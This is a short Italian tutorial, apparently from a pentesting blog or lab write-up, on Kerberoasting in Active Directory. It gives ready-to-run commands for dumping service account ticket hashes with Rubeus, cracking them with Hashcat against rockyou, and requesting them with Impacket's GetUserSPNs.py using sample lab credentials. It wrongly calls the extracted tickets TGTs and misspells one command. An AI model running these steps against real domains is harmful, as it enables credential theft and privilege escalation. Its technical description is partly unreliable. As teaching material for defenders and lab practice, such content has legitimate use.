tags active_directory kerberos kerberoasting priv_esc windows Rubeus
Rubeus è uno strumento per sfruttare le debolezze di Kerberos negli ambienti Windows. Kerberoasting è un metodo per estrarre hash di ticket granting ticket (TGT) da AD. Gli aggressori prendono di mira gli account di servizio con nomi di servizio principali Kerberos (SPN). I TGT vengono richiesti al DC per questi account, quindi violati offline per rivelare le password degli utenti. Kerberoasting sfrutta le password deboli degli account di servizio e la natura dell’autenticazione Kerberos.
Questo tool una volta scaricato è semplicissimo da usare, basta digitare questo comando e un file con all’interno l’hash della password verrà creato, in questo esempio nel file hash.txt:
rubeus.exe kerberoast /outfile:hash.txt
#Se non vuoi salvare nessun file digita solo:
rebeus.exe kerberoast

Come puoi notare nell’ultima riga ti indica il percorso nel quale è stato salvato il file hash, in questo caso C:\Users\Public\Downloads\hash.txt.
Cracking Hash
Una volta ottenuto l’hash lo possiamo craccare con John the Ripper o Hashcat.
Hashcat
hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt

La password è advanced!
Impacket
https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19
cd Impacket-0.9.19
pip install .
cd /usr/share/doc/python3-impacket/examples/
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.212.113 -request